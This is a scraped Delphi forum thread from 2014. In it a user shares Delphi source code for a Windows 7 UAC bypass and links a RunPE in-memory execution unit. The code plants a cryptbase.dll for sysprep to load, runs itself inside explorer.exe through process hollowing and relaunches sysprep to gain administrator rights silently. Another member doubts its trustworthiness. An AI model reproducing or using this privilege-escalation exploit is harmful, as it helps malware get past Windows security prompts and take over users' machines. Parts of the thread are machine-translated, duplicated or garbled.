UAC Bypass (Working) - Общие вопросы Delphi

Delphi.Coder · 11.04.2014, 19:24

Found a great way to bypass UAC, Tested on Windows 7 x86.

Just wanted to share, Take a look at the .txt, It was to many characters for me to post

This RunPE is necessary (uExecFromMem): http://www.delphibasics.info/home/de...n7x64bytestest

Stilet · 11.04.2014, 20:52

Почему не на русском языке? Форум русскоязычный же.

Delphi.Coder · 11.04.2014, 21:12

Im sorry man, Its just i find these russian forums more helpful than american forums. I just wanted to share it with you guys, its new. i only speak a little russian

Им жаль мужчина, Его просто я нахожу эти русские форумов более полезным, чем американских форумах. Я просто хотел поделиться им с вами, ребята, его новая. я только немного говорю по России

Stilet · 11.04.2014, 21:54

Хм. Ну в общем на всякий случай будь готов к тому что тебя не поймут.

Delphi.Coder · 12.04.2014, 01:27

О нет, ее очень легко понять. Исходный код рецептура..не русский. Bablon помогает мне на вещи, на которые я надзирательница еще. Но обмен мгновенными сообщениями с помощью Rosetta stone сейчас и узнайте российская

Delphi.Coder · 12.04.2014, 01:40

Цитата:

Сообщение от Delphi.Coder

Found a great way to bypass UAC, Tested on Windows 7 x86.

Just wanted to share, Take a look at the .txt, It was to many characters for me to post

This RunPE is necessary (uExecFromMem): http://www.delphibasics.info/home/de...n7x64bytestest

Код:

Function mFileToStr(Ruta: ansistring): ansistring;
var
  sFile: HFile;
  uBytes: Cardinal;
begin
  Result:= '';
  sFile := _lopen(PansiChar(Ruta), OF_READ);
  uBytes := GetFileSize(sFile, nil);
  SetLength(Result, uBytes);
  _lread(sFile, @Result[1], uBytes);
  _lclose(sFile);
end;

Procedure mWriteFileFromStr(Cadena, Ruta: ansistring);
var
  sFile: HFile;
  uBytes: Cardinal;
begin
  sFile := _lcreat(PansiChar(Ruta), 0);
  uBytes := Length(Cadena);
  _lwrite(sFile, @Cadena[1], uBytes);
  _lclose(sFile);
end;

function IsUserAnAdmin: integer; external 'shell32';

Function Bypass: bool;
var
  Yo: ansistring;
  DllD: ansistring;
  psinfo: pshellexecuteinfow;
  tmpdir: array [0..MAX_PATH] of char;
  windir: array [0..MAX_PATH] of char;
  sysdir: array [0..MAX_PATH] of char;
  tmp: string;
  sys: string;
  win: string;
  sysprp: string;
begin
  Result:= False;
  GetTempPath(MAX_PATH, tmpdir);
  GetSystemDirectory(sysdir, MAX_PATH);
  GetWindowsDirectory(windir, MAX_PATH);
  win:= windir + '\explorer.exe';
  sys:= sysdir + '\sysprep\cryptbase.dll';
  sysprp:= sysdir + '\sysprep\sysprep.exe';
  tmp := tmpdir + 'cryptbase.dll';

  if isuseranadmin = 1  then
    begin
      Result:= True;
      while fileexists(sys) do
        deletefile(sys);
      deletefile(tmp);
    end
    else
    begin
      if ansiuppercase(ExtractFileName(paramstr(0))) <> 'EXPLORER.EXE' then
        begin
          Yo:= mfiletostr(paramstr(0));
          SetLength(DllD, SizeOf(DllDummy));
          CopyMemory(@DllD[1], @DllDummy[0], SizeOf(DllDummy));
          mWriteFileFromStr(DllD, tmp);
          ExecuteFromMem(win, paramstr(0), @FOp[0]);
          ExecuteFromMem(win, paramstr(0), @Yo[1]);
          exitprocess(0);
        end
        else
        begin
          New(psInfo);
          psinfo.cbSize:= sizeof(shellexecuteinfo);
          psinfo.fMask:= SEE_MASK_INVOKEIDLIST;
          psinfo.lpVerb:= 'open';
          PSINFO.lpFile:= PCHAR(sysprp);
          psinfo.lpParameters:= pchar(paramstr(1));
          psinfo.nShow:= SW_SHOWNORMAL;
          shellexecuteexw(psinfo);
          exitprocess(0);
        end;
    end;
end;

XE5 · 12.04.2014, 02:20

Delphi.Coder
russian uac.txt

Цитата:

???? Unit1 ;

?????????

?????????????
Winapi.Windows , Winapi.Messages , System.SysUtils , System.Variants , System.Classes , Vcl.Graphics ,
Vcl.Controls , Vcl.Forms , Vcl.Dialogs , Vcl.StdCtrls , uexecfrommem , winapi.ShellAPI ;

Stilet · 12.04.2014, 11:40

Что-то эта программа доверия не внушает.

Delphi.Coder · 12.04.2014, 19:52

почему вы говорите, что друг?

Stilet · 12.04.2014, 20:02

Цитата:

что друг?

What?
.....

11.04.2014, 20:52	#2
Stilet Белик Виталий :) Старожил Регистрация: 23.07.2007 Сообщений: 57,097	Почему не на русском языке? Форум русскоязычный же. I'm learning to live...

11.04.2014, 21:54	#4
Stilet Белик Виталий :) Старожил Регистрация: 23.07.2007 Сообщений: 57,097	Хм. Ну в общем на всякий случай будь готов к тому что тебя не поймут. I'm learning to live...

12.04.2014, 01:27	#5
Delphi.Coder Пользователь Регистрация: 09.04.2014 Сообщений: 13	О нет, ее очень легко понять. Исходный код рецептура..не русский. Bablon помогает мне на вещи, на которые я надзирательница еще. Но обмен мгновенными сообщениями с помощью Rosetta stone сейчас и узнайте российская Последний раз редактировалось Delphi.Coder; 12.04.2014 в 01:35.

12.04.2014, 11:40	#8
Stilet Белик Виталий :) Старожил Регистрация: 23.07.2007 Сообщений: 57,097	Что-то эта программа доверия не внушает. I'm learning to live...

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
UAC, автозагрузка и ПО	Человек_Борща	Win Api	14	28.10.2013 23:30
CreateProcess и UAC	XeruH	Общие вопросы Delphi	0	02.04.2013 22:16
Delphi vs UAC	dyonysos	Общие вопросы Delphi	0	02.05.2010 20:02

11.04.2014, 21:12	#3
Delphi.Coder Пользователь Регистрация: 09.04.2014 Сообщений: 13	Im sorry man, Its just i find these russian forums more helpful than american forums. I just wanted to share it with you guys, its new. i only speak a little russian Им жаль мужчина, Его просто я нахожу эти русские форумов более полезным, чем американских форумах. Я просто хотел поделиться им с вами, ребята, его новая. я только немного говорю по России

12.04.2014, 19:52	#9
Delphi.Coder Пользователь Регистрация: 09.04.2014 Сообщений: 13	почему вы говорите, что друг?